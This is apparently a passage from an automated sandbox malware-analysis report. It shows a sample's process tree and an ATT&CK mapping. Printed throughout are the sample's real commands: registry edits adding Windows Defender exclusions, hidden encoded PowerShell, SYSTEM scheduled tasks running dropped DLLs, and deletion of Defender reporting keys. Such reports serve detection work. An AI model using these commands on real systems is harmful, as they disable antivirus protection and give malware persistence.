/d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4976

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YyYjRnRkbVRlC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2976

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YyYjRnRkbVRlC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YyYjRnRkbVRlC" /t REG_DWORD /d 0 /reg:64
3⤵
- Drops file in System32 directory
PID:4144

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltrhbdpAzPnaisqePaR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltrhbdpAzPnaisqePaR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uXFrNnbxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uXFrNnbxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xzDgZbVAMpcU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xzDgZbVAMpcU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5032

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWoUVQYphcUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zWoUVQYphcUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uoeTMjmBwbxJSYVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uoeTMjmBwbxJSYVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR /t REG_DWORD /d 0 /reg:32
3⤵
PID:1220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\wHhNLFWDcbvPErQrR /t REG_DWORD /d 0 /reg:64
3⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTUWAcRmBxLxQDsb /t REG_DWORD /d 0 /reg:32
3⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ZTUWAcRmBxLxQDsb /t REG_DWORD /d 0 /reg:64
3⤵
PID:4144

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBXPPjpWJ" /SC once /ST 18:17:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1008

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBXPPjpWJ"
2⤵
PID:2684

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4260

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBXPPjpWJ"
2⤵
PID:5616

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "rrfLLMZdwqFuiRyRk" /SC once /ST 21:06:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\kCOoUnPexuQcwYF\ZtcNaKI.exe\" yF /site_id 690689 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5660

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "rrfLLMZdwqFuiRyRk"
2⤵
PID:5712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4064

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2416

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1220

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5024

C:\Users\Admin\Desktop\setup_2.exe_id25986943.exe
"C:\Users\Admin\Desktop\setup_2.exe_id25986943.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Windows\Temp\ZTUWAcRmBxLxQDsb\kCOoUnPexuQcwYF\ZtcNaKI.exe
C:\Windows\Temp\ZTUWAcRmBxLxQDsb\kCOoUnPexuQcwYF\ZtcNaKI.exe yF /site_id 690689 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Checks for any installed AV software in registry
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5760

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bPLWYbEmiNLoeLgDZO"
2⤵
PID:5796

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:5848

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:5896

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:5912

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:5960

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\uXFrNnbxU\ICOuPs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IHfUYafURfJPxJE" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5988

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "IHfUYafURfJPxJE2" /F /xml "C:\Program Files (x86)\uXFrNnbxU\GozTVNE.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3684

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "IHfUYafURfJPxJE"
2⤵
PID:4748

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "IHfUYafURfJPxJE"
2⤵
PID:1744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "xMVZbUzooATnpr" /F /xml "C:\Program Files (x86)\xzDgZbVAMpcU2\EgXZnWi.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3820

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "hPaTWMKhISzaX2" /F /xml "C:\ProgramData\uoeTMjmBwbxJSYVB\yMKcdPg.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1068

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "pRgklVFfAhfqdzzLk2" /F /xml "C:\Program Files (x86)\ltrhbdpAzPnaisqePaR\wBCuDYY.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1800

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "uOaHhhRVoELLoDMhYqk2" /F /xml "C:\Program Files (x86)\YyYjRnRkbVRlC\oAPPItR.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4692

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "sZfSYDKOGgdsigSHj" /SC once /ST 18:05:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZTUWAcRmBxLxQDsb\HJdplzGu\IoDHgbW.dll\",#1 /site_id 690689" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3244

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "sZfSYDKOGgdsigSHj"
2⤵
PID:6012

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGnhK1" /SC once /ST 07:26:33 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
2⤵
- Creates scheduled task(s)
PID:816

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bGnhK1"
2⤵
PID:4600

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bGnhK1"
2⤵
PID:4008

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
2⤵
PID:216

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
3⤵
PID:3812

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
2⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
3⤵
PID:4728

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rrfLLMZdwqFuiRyRk"
2⤵
PID:1152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3308 -ip 3308
1⤵
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3308 -ip 3308
1⤵
PID:4252

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTUWAcRmBxLxQDsb\HJdplzGu\IoDHgbW.dll",#1 /site_id 690689
1⤵
PID:6072

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZTUWAcRmBxLxQDsb\HJdplzGu\IoDHgbW.dll",#1 /site_id 690689
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:6088

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "sZfSYDKOGgdsigSHj"
3⤵
PID:4724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 3308 -ip 3308
1⤵
PID:5192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3308 -ip 3308
1⤵
PID:3508

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb0b649758,0x7ffb0b649768,0x7ffb0b649778
2⤵
PID:3892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:2
2⤵
PID:1748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:8
2⤵
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:8
2⤵
PID:5688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:5756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:5804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3704 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:5964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4704 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:1604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4980 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:3876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4972 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:4780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:8
2⤵
PID:6056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6032 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:8
2⤵
PID:6040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5856 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5672 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:3444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6236 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:5860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6420 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:1
2⤵
PID:3252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6456 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:8
2⤵
PID:2596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6436 --field-trial-handle=1972,i,1070310644915877870,11021519933557337664,131072 /prefetch:8
2⤵
- Modifies registry class
PID:216

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5952

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
1⤵
PID:1904

C:\Windows\system32\whoami.exe
whoami
2⤵
PID:1680

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery